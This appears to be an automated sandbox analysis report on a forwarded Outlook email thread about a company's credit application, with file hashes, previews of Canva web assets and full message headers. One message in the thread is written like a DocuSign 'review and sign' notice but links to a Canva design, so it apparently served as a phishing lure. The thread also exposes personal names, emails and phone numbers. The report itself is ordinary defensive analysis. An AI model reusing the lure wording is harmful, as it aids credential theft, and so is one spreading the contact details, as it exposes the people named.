                                                                Preview:<svg width="33" height="32" viewBox="0 0 33 32" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M32.29 16c0 8.837-7.164 16-16 16-8.837 0-16-7.163-16-16 0-8.836 7.163-16 16-16 8.836 0 16 7.164 16 16Z" fill="url(#_3900663394__a)"/><path d="M26.131 15.809c-.055-.127-1.41-3.103-4.195-3.103-2.783 0-4.138 2.976-4.195 3.103a.47.47 0 0 0 .136.556c.165.134.4.138.575.013.011-.009 1.188-.849 3.484-.849 2.284 0 3.458.83 3.485.848a.469.469 0 0 0 .574-.01.471.471 0 0 0 .136-.558ZM14.836 15.809c-.056-.127-1.41-3.103-4.195-3.103-2.783 0-4.138 2.976-4.194 3.103a.47.47 0 0 0 .71.569c.011-.009 1.187-.849 3.484-.849 2.284 0 3.458.83 3.485.848a.468.468 0 0 0 .574-.01.47.47 0 0 0 .136-.558ZM28.524 14.118a.943.943 0 0 1-.874-.592c-1.673-4.183-5.856-5.064-5.898-5.074a.94.94 0 1 1 .369-1.844c.212.041 5.229 1.099 7.278 6.219a.942.942 0 0 1-.875 1.291ZM4.053 14.118a.941.941 0 0 1-.873-1.291c2.048-5.12 7.065-6.178 7.277-6.22a.94.94 0 0 1 .373 1.845c-.174.036-4.242.923-5.902 5.074a.944.944 0 0 1-.875.592ZM
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text
                                                                Category:dropped
                                                                Size (bytes):431
                                                                Entropy (8bit):5.191711309396401
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8BB40E97D3FB34600AA78099D786B62D
                                                                SHA1:D8F86D070EF9CB90108A0EF0BAD525246EA03062
                                                                SHA-256:0091546D83D3C51B541F20DCD9A99E4819225CBB7553CC2A1A27EA17CD0C4069
                                                                SHA-512:C8D929F15BDAF1B714BE9A407C5396ABDC0FCD8D37C1669252F29C8F57817765C19094F01EAD99AE41D8B8B0DE0A1A73832B2898F2A97BDC8760DDBA6A3A6203
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6637],{../***/ 360045:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(206405);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {.}).call(self, self._45f7853dc7660378a038952b53c0953e);}..}])
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (1042)
                                                                Category:downloaded
                                                                Size (bytes):139322
                                                                Entropy (8bit):5.284730248254053
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6B4FECBEE9CC3F25607281AB522BD7CB
                                                                SHA1:831EEB3136D6134A32ECFC818E21C2600D861758
                                                                SHA-256:E2CF3293010ABDAFC00BF889941F498E1B8F17139B20FB6B8D829F312132CB21
                                                                SHA-512:777AE1053579C19CA5C2C14B1271B9C95ED8559EE32825FAF9390ABF5A9E77B66F24BE6E3DE7244AD727BBBCC249FD3CCC4EA1B8825D5215359CC17631038E7E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/f29acced9c6bac84.js
                                                                Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5927],{../***/ 389580:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_req__(642158);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var tk;var Zj;var Ci;var Ei;var gm;var Xh;var Wh;var $l;var Ql;var Mj;var Lj;var Cl;var Bl;var yk;var L=__c.L;var Pi;var xi;var al;var zi;var xk;var Rk;var Jk;var Hk;var Ik;var Ek;var ba=__c.ba;var Mh;var Vj;var Tj;var Oj;var wi;var vi;var z=__c.z;var B=__c.B;var Mi;var Ni;var Li;var Bi;var ui;var ti;var w=__c.w;var ni;var Gh;var t=__c.t;.var Kpa,Nh,Lpa,Mpa,Rpa,$h,ci,di,ei,Spa,fi,ii,mi,Upa,pi,hi,qi,si,Wpa,gi,Ypa,Xpa,Zpa,yi,aqa,$pa,bqa,Qi,Ri,qqa,Si,Vi,rqa,Wi,Xi,Yi,tqa,Ti,vqa,uqa,aj,sqa,wqa,xqa,yqa,Zi,bj,cj,zqa,dj,Aqa,fj,gj,hj,ij,jj,Fqa,Dqa,Eqa,Gqa,lj,mj,Kqa,nj,oj,pj,qj,rj,sj,uj,vj,wj,xj,Lqa,Bj,Aj,Mqa,Cj,Dj,Oqa,Gj,Hj,Jj,Kj,Q
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (319)
                                                                Category:downloaded
                                                                Size (bytes):382
                                                                Entropy (8bit):5.439423170296592
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0EECBA4C5EADF6A40CDC31DBAB617AF9
                                                                SHA1:6F716C76C6F64979124AAE9C3114DE6F374C7626
                                                                SHA-256:0AA923A81790C6F42A4C0AF6D018FA86D8BE69D98EE9C21FEDB280443279365A
                                                                SHA-512:E8A64EE7E57CE610AA76E43B24E6DC5C95B41A11C838B6AD8EBE23862F5B817103DA5D553055046D1CB1ED06F6076FF98DAAC9CFDF9EEBC6E86D5D47609B6484
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://static.canva.com/web/9e2d4720ffac5af4.ltr.css
                                                                Preview:.ygGKTQ{box-sizing:border-box;display:inline-block;vertical-align:text-bottom}.ygGKTQ._61VRqQ{height:12px;width:12px}.ygGKTQ.abulbg{height:16px;width:16px}.ygGKTQ.AAwCeg{height:18px;width:18px}.ygGKTQ.dR8M7g{height:24px;width:24px}.ygGKTQ._1aCkfA{height:32px;width:32px}.ygGKTQ>svg{display:block;height:100%;width:100%}./*# sourceMappingURL=sourcemaps/9e2d4720ffac5af4.ltr.css.map*/
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):1404
                                                                Entropy (8bit):4.114328576097192
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:ABA10B640F15BB01B8E5F0B804EEFC7F
                                                                SHA1:65D1EDB21B0F31D4CCB9703EB05132A0E42D093D
                                                                SHA-256:6A21FCEDE3E9D5593CF90C894BC059A94BBAE8D5D22ED0AC5511A1327F276881
                                                                SHA-512:FDC916824C065944D02B7956BE310F01B9A56562BBB1510C345EDC925EA6CE478D235B5348AD140028CFA4F483BF1E947533CB83176A9F44DC13353A938329DF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#FFDB5E" d="M34.956 17.916c0-.503-.12-.975-.321-1.404-1.341-4.326-7.619-4.01-16.549-4.221-1.493-.035-.639-1.798-.115-5.668.341-2.517-1.282-6.382-4.01-6.382-4.498 0-.171 3.548-4.148 12.322-2.125 4.688-6.875 2.062-6.875 6.771v10.719c0 1.833.18 3.595 2.758 3.885C8.195 34.219 7.633 36 11.238 36h18.044a3.337 3.337 0 0 0 3.333-3.334c0-.762-.267-1.456-.698-2.018 1.02-.571 1.72-1.649 1.72-2.899 0-.76-.266-1.454-.696-2.015 1.023-.57 1.725-1.649 1.725-2.901 0-.909-.368-1.733-.961-2.336a3.311 3.311 0 0 0 1.251-2.581z"/><path fill="#EE9547" d="M23.02 21.249h8.604c1.17 0 2.268-.626 2.866-1.633a.876.876 0 0 0-1.506-.892 1.588 1.588 0 0 1-1.361.775h-8.81c-.873 0-1.583-.71-1.583-1.583s.71-1.583 1.583-1.583H28.7a.875.875 0 0 0 0-1.75h-5.888a3.337 3.337 0 0 0-3.333 3.333c0 1.025.475 1.932 1.205 2.544a3.32 3.32 0 0 0-.998 2.373c0 1.028.478 1.938 1.212 2.549a3.318 3.318 0 0 0 .419 5.08 3.305 3.305 0 0 0-.852 2.204 3.337 3.337 0 0 0 3.
                                                                File type:CDFV2 Microsoft Outlook Message
                                                                Entropy (8bit):5.32659175753632
                                                                TrID:
                                                                • Outlook Message (71009/1) 58.92%
                                                                • Outlook Form Template (41509/1) 34.44%
                                                                • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                                                                File name:FW_ SLS properties Credit application.msg
                                                                File size:145'920 bytes
                                                                MD5:6550979bbc9d04348f3d32e0764ad95a
                                                                SHA1:caa91816d5da43dee533d98775e9ff7cfc272819
                                                                SHA256:899bf7076e1030ae35dbf1e13157d62b707593734fd146b6379cb5ce17fbe6be
                                                                SHA512:21835977bbe5831476584f64cfcad630049fd2190168791636636778fb25393911532f57f2dfbb4a7ae7df60f78752d310cf1bc7148f81294a5f0155915fd218
                                                                SSDEEP:1536:jg1EmWiWxWtT+EWPTEs9olVolRSzn+kHrX8zzVlWdW1fT+LivuVZOsNT50jz7nx6:k1E0+R/lYnzeL+6ulNT50jzLxM
                                                                TLSH:4CE3882536FD4606F27B9F725AF250979536FC42AD24CB8F3291334E05B2A40AD61B3B
                                                                File Content Preview:........................>......................................................................................................................................................................................................................................
                                                                Subject:FW: SLS properties Credit application
                                                                From:Carmen Vazquez <cvazquez@steamsolutions.com>
                                                                To:Cameron Gambrell <cgambrell@steamsolutions.com>
                                                                Cc:
                                                                BCC:
                                                                Date:Fri, 23 Aug 2024 15:51:37 +0200
                                                                Communications:
                                                                • Email from yesterday Carmen Vazquez cvazquez@steamsolutions.com <mailto:cvazquez@steamsolutions.com> C: 713-294-4397 O: 713.464.9055
                                                                • From: Desiree Lorenzo <desiree@slsproperties.net> Sent: Thursday, August 22, 2024 1:03 PM To: Carmen Vazquez <cvazquez@steamsolutions.com> Subject: Re: SLS properties Credit application CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. Hi Carmen, Desiree Lorenzo sent you a Document to review and sign <https://urldefense.proofpoint.com/v2/url?u=https-3A__na4.docusign.net_signing_emails_v1-2D5ef47dc5e3bf4df6a32273d2c3d47b533c0ba2d82b13463abfe2e47c82782d8f&d=DwMGaQ&c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM&r=_q-s3QiVuOPjtHJaJVkKfweCaffZ83--RRmzYLW5xz8&m=mdW_iTAcERmykitoq0JvIEABLskmQdaEglbGg99bNm-8JYwQDx66eHAvBVhOGzWR&s=aA67FlHFjD_9EgQK6w4Ax5v4YBO-2SR_9E4zMM7LokA&e=> . <https://urldefense.proofpoint.com/v2/url?u=https-3A__na4.docusign.net_signing_emails_v1-2D5ef47dc5e3bf4df6a32273d2c3d47b534d9936d438134d64a42a2e14ea914637&d=DwMGaQ&c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM&r=_q-s3QiVuOPjtHJaJVkKfweCaffZ83--RRmzYLW5xz8&m=mdW_iTAcERmykitoq0JvIEABLskmQdaEglbGg99bNm-8JYwQDx66eHAvBVhOGzWR&s=HOP78q41skW8KIWnZ81FjgKy2TFdjVg_uKtXGHTRTzc&e=> REVIEW DOCUMENT <https://urldefense.proofpoint.com/v2/url?u=https-3A__www.canva.com_design_DAGOmfvTQik_JOV039GfGLa9-2DL3q9YZIrQ_view-3Futm-5Fcontent-3DDAGOmfvTQik-26utm-5Fcampaign-3Ddesignshare-26utm-5Fmedium-3Dlink-26utm-5Fsource-3Deditor&d=DwMGaQ&c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM&r=_q-s3QiVuOPjtHJaJVkKfweCaffZ83--RRmzYLW5xz8&m=mdW_iTAcERmykitoq0JvIEABLskmQdaEglbGg99bNm-8JYwQDx66eHAvBVhOGzWR&s=7BTLf4d7joI8hUOD4oRSjtHYMyv5oKmd9mD0yG-l0R8&e=> Thank you Desiree Lorenzo 5177 Richmond Ave Ste 130 Houston, TX 77056 Office: 713-528-0300 Moble: 281-798-4677 ________________________________
                                                                • From: Diane Brinck <dbrinck@steamsolutions.com <mailto:dbrinck@steamsolutions.com> > Sent: Wednesday, August 21, 2024 11:01 AM To: Desiree Lorenzo <desiree@slsproperties.net <mailto:desiree@slsproperties.net> > Cc: Carmen Vazquez <cvazquez@steamsolutions.com <mailto:cvazquez@steamsolutions.com> >; Richard Taylor <rtaylor@steamsolutions.com <mailto:rtaylor@steamsolutions.com> > Subject: RE: SLS properties Credit application Thank you for confirming. Diane Brinck Office Manager Texas Steam Equipment Company 2302 S. Battleground Road La Porte, TX 77571 713-464-9055 dbrinck@steamsolutions.com <mailto:dbrinck@steamsolutions.com>
                                                                • From: Desiree Lorenzo <desiree@slsproperties.net <mailto:desiree@slsproperties.net> > Sent: Wednesday, August 21, 2024 10:52 AM To: Diane Brinck <dbrinck@steamsolutions.com <mailto:dbrinck@steamsolutions.com> > Cc: Carmen Vazquez <cvazquez@steamsolutions.com <mailto:cvazquez@steamsolutions.com> >; Richard Taylor <rtaylor@steamsolutions.com <mailto:rtaylor@steamsolutions.com> > Subject: RE: SLS properties Credit application CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. Hi Diane, We are not tax exempt. Thanks, Desiree Lorenzo 5177 Richmond Ave Ste 130 Houston, TX 77056 Office: 713-526-0300 Moble: 281-796-4677
                                                                • From: Diane Brinck <dbrinck@steamsolutions.com <mailto:dbrinck@steamsolutions.com> > Sent: Wednesday, August 21, 2024 10:39 AM To: Desiree Lorenzo <desiree@slsproperties.net <mailto:desiree@slsproperties.net> > Cc: Carmen Vazquez <cvazquez@steamsolutions.com <mailto:cvazquez@steamsolutions.com> >; Richard Taylor <rtaylor@steamsolutions.com <mailto:rtaylor@steamsolutions.com> > Subject: FW: SLS properties Credit application Desiree My name is Diane Brinck and I will be processing your application for a credit account with Texas Steam Equipment Company. Will your purchases be taxable? If not, please provide a signed copy of your Tax Exemption Certificate. If your purchases are taxable, please respond with a confirmation. Best, Diane Brinck Office Manager Texas Steam Equipment Company 2302 S. Battleground Road La Porte, TX 77571 713-464-9055 dbrinck@steamsolutions.com <mailto:dbrinck@steamsolutions.com>
                                                                • From: Carmen Vazquez <cvazquez@steamsolutions.com <mailto:cvazquez@steamsolutions.com> > Sent: Tuesday, August 20, 2024 10:26 AM To: Diane Brinck <dbrinck@steamsolutions.com <mailto:dbrinck@steamsolutions.com> > Cc: Richard Taylor <rtaylor@steamsolutions.com <mailto:rtaylor@steamsolutions.com> > Subject: SLS properties Credit application Good morning Diane, SLS credit application attached. PO is for $189,204.00 Carmen Vazquez cvazquez@steamsolutions.com <mailto:cvazquez@steamsolutions.com> C: 713-294-4397 O: 713.464.9055
                                                                • From: Richard Taylor <rtaylor@steamsolutions.com <mailto:rtaylor@steamsolutions.com> > Sent: Tuesday, August 20, 2024 10:17 AM To: Carmen Vazquez <cvazquez@steamsolutions.com <mailto:cvazquez@steamsolutions.com> > Subject: Fwd: Sellers Boiler Quote Carmen, See completed TSE credit application for SLS Properties. Thanks, Richard Sent from my iPhone Begin forwarded message: From: Desiree Lorenzo <desiree@slsproperties.net <mailto:desiree@slsproperties.net> > Date: August 20, 2024 at 10:03:42 AM CDT To: Hisam Saker <hisam@slsproperties.net <mailto:hisam@slsproperties.net> > Cc: Richard Taylor <rtaylor@steamsolutions.com <mailto:rtaylor@steamsolutions.com> >, Louis Schwartz <sales@lonestarboilers.com <mailto:sales@lonestarboilers.com> > Subject: RE: Sellers Boiler Quote CAUTION: This email originated from outside of the organization. Do not click links or open attachments unless you recognize the sender and know the content is safe. Good morning, Please see the attached credit application filled out. Let me know if you need anything else from me. Thanks, Desiree Lorenzo 5177 Richmond Ave Ste 130 Houston, TX 77056 Office: 713-526-0300 Moble: 281-796-4677
                                                                Attachments:
                                                                • image001.png
                                                                • image002.png
                                                                • image003.png
                                                                Key Value
                                                                Receivedfrom MW4PR15MB5309.namprd15.prod.outlook.com
                                                                1351:38 +0000
                                                                Authentication-Resultsdkim=none (message not signed)
                                                                by SA1PR15MB5094.namprd15.prod.outlook.com (260310b6:806:1dd::11) with
                                                                2024 1351:38 +0000
                                                                ([fe80:83c5:bf56:b0e2:bb05%7]) with mapi id 15.20.7897.014; Fri, 23 Aug 2024
                                                                Content-Typeapplication/ms-tnef; name="winmail.dat"
                                                                Content-Transfer-Encodingbinary
                                                                FromCarmen Vazquez <cvazquez@steamsolutions.com>
                                                                ToCameron Gambrell <cgambrell@steamsolutions.com>
                                                                SubjectFW: SLS properties Credit application
                                                                Thread-TopicSLS properties Credit application
                                                                Thread-IndexAQHa8xVL8MdRkqhUTE6m09NCR2diKrIx2TqwgAAErwCAAAKwsIABtDUAgAFMHFA=
                                                                DateFri, 23 Aug 2024 13:51:37 +0000
                                                                Message-ID<MW4PR15MB530954CB327E9522C9933BE6A4882@MW4PR15MB5309.namprd15.prod.outlook.com>
                                                                References<SA1PR15MB49207445E7ECB360E59E3824DE802@SA1PR15MB4920.namprd15.prod.outlook.com>
                                                                In-Reply-To<SA0PR17MB4238429C3A886587BC5FF7CBAF8F2@SA0PR17MB4238.namprd17.prod.outlook.com>
                                                                Accept-Languageen-US
                                                                Content-Languageen-US
                                                                X-MS-Has-Attachyes
                                                                X-MS-Exchange-Organization-SCL1
                                                                X-MS-TNEF-Correlator<MW4PR15MB530954CB327E9522C9933BE6A4882@MW4PR15MB5309.namprd15.prod.outlook.com>
                                                                msip_labelsMIME-Version: 1.0
                                                                X-MS-Exchange-Organization-MessageDirectionalityOriginating
                                                                X-MS-Exchange-Organization-AuthSourceMW4PR15MB5309.namprd15.prod.outlook.com
                                                                X-MS-Exchange-Organization-AuthAsInternal
                                                                X-MS-Exchange-Organization-AuthMechanism04
                                                                X-MS-Exchange-Organization-Network-Message-Id1d41451d-115f-4523-d4af-08dcc37ab59f
                                                                X-MS-PublicTrafficTypeEmail
                                                                X-MS-TrafficTypeDiagnosticMW4PR15MB5309:EE_|SA1PR15MB5094:EE_|SA1PR15MB4675:EE_
                                                                Return-Pathcvazquez@steamsolutions.com
                                                                X-MS-Exchange-Organization-ExpirationStartTime23 Aug 2024 13:51:38.4820
                                                                X-MS-Exchange-Organization-ExpirationStartTimeReasonOriginalSubmit
                                                                X-MS-Exchange-Organization-ExpirationInterval1:00:00:00.0000000
                                                                X-MS-Exchange-Organization-ExpirationIntervalReasonOriginalSubmit
                                                                X-MS-Office365-Filtering-Correlation-Id1d41451d-115f-4523-d4af-08dcc37ab59f
                                                                X-Microsoft-AntispamBCL:0;ARA:13230040|366016|41050700001;
                                                                X-Forefront-Antispam-ReportCIP:255.255.255.255;CTRY:;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:MW4PR15MB5309.namprd15.prod.outlook.com;PTR:;CAT:NONE;SFS:(13230040)(366016)(41050700001);DIR:INT;
                                                                X-MS-Exchange-CrossTenant-OriginalArrivalTime23 Aug 2024 13:51:37.9973
                                                                X-MS-Exchange-CrossTenant-FromEntityHeaderHosted
                                                                X-MS-Exchange-CrossTenant-Idae77d94d-d50f-4ea7-877a-9ae2f36050b2
                                                                X-MS-Exchange-CrossTenant-AuthSourceMW4PR15MB5309.namprd15.prod.outlook.com
                                                                X-MS-Exchange-CrossTenant-AuthAsInternal
                                                                X-MS-Exchange-CrossTenant-Network-Message-Id1d41451d-115f-4523-d4af-08dcc37ab59f
                                                                X-MS-Exchange-CrossTenant-MailboxTypeHOSTED
                                                                X-MS-Exchange-CrossTenant-UserPrincipalName03Nr5LkP3uGAa+vUqPKu1JScGj7uOtyp4So145u5OzvT5G4fM0w7zyJ3zWduzkaWx4aauupZEu1t/7TtBArBXLlNcQijmI+xUkXIroLW8DI=
                                                                X-MS-Exchange-Transport-CrossTenantHeadersStampedSA1PR15MB5094
                                                                X-MS-Exchange-Transport-EndToEndLatency00:00:02.7322182
                                                                X-MS-Exchange-Processed-By-BccFoldering15.20.7897.007
                                                                X-Microsoft-Antispam-Mailbox-Deliveryucf:0;jmr:0;auth:0;dest:I;ENG:(910001)(944506478)(944626604)(920097)(425001)(930097)(140003)(1310096);
                                                                X-Microsoft-Antispam-Message-Info/K/sfdaHkDITlZknj2xYhcq4Fj2qOMt8HrA8ObaGQwYijRl32CF0eYQNzXu8bcnJ7V/w7CKdO797PqEWRX1q5I1R/yaPW7XUptdDmpQir6g2lgjfkbeCgfW40Mr1/3vclCU/hD3Ev2ocpR1OAh5x5JNtePMZIpSoKu5nZ/mYHptyiy7RaeTLhIk4iXHNS0FuRt6W1ffd5IE9IrJWTCv3FVxjRc8EkhnxG4gUhkuRA0oC3krG0wxpN7JpKUkWzi6Q8e9HXnrk6SBZMaJXsqJdQK3tnzg1IVyydCgp5D/xVYqkp3YDZLN7AoIo0N8L1cafq5JwKAosWcT3wF81WzaUN7OywbRZV2HDiD3/fUSj3hSABe4m1KAb2McVbFx4OC19oMCKt7P+KQN/AjVmuoUv36u4LigkOSojeazbQUNc3yoi0xut7v/6FUElcIdb/VOn0Lb2pNe3PHpgT8yblY3JrnhljLAgC8MSollLgxBleuH4g6Jv9+zkzqtNPe2lFIAhHURXkHe1xjgsSjANuRQqs36HGVt1H27tAhiQAfA/Cw8Y5MMacqsKk+neXEpDPtsims3/A0oztGntAxDa2jF9C2DJna222YCwBZZ01hV9x/0Vmf6UjnRlFvF23zmgbgHQ24IdaKioWSyF4KsD2N3jSoItOF123mqcoWZlR3owRfj3iuNdH4KG3TTdS1+6fCjhztkj8rgc59k8hyFWF2aVy+RUZ8lA2fDGGUGxMJDgBBjasXDfPT3o/YL9HhLs55NOZWouLwrlUtY9pHMIt7+1wDdkpYSG80cxeYEfN5PxFZB6/MN3wXvwqfeG870V7GZXxPEUAek6ugUxltD2d1RRpw==
                                                                dateFri, 23 Aug 2024 15:51:37 +0200

                                                                Icon Hash:c4e1928eacb280a2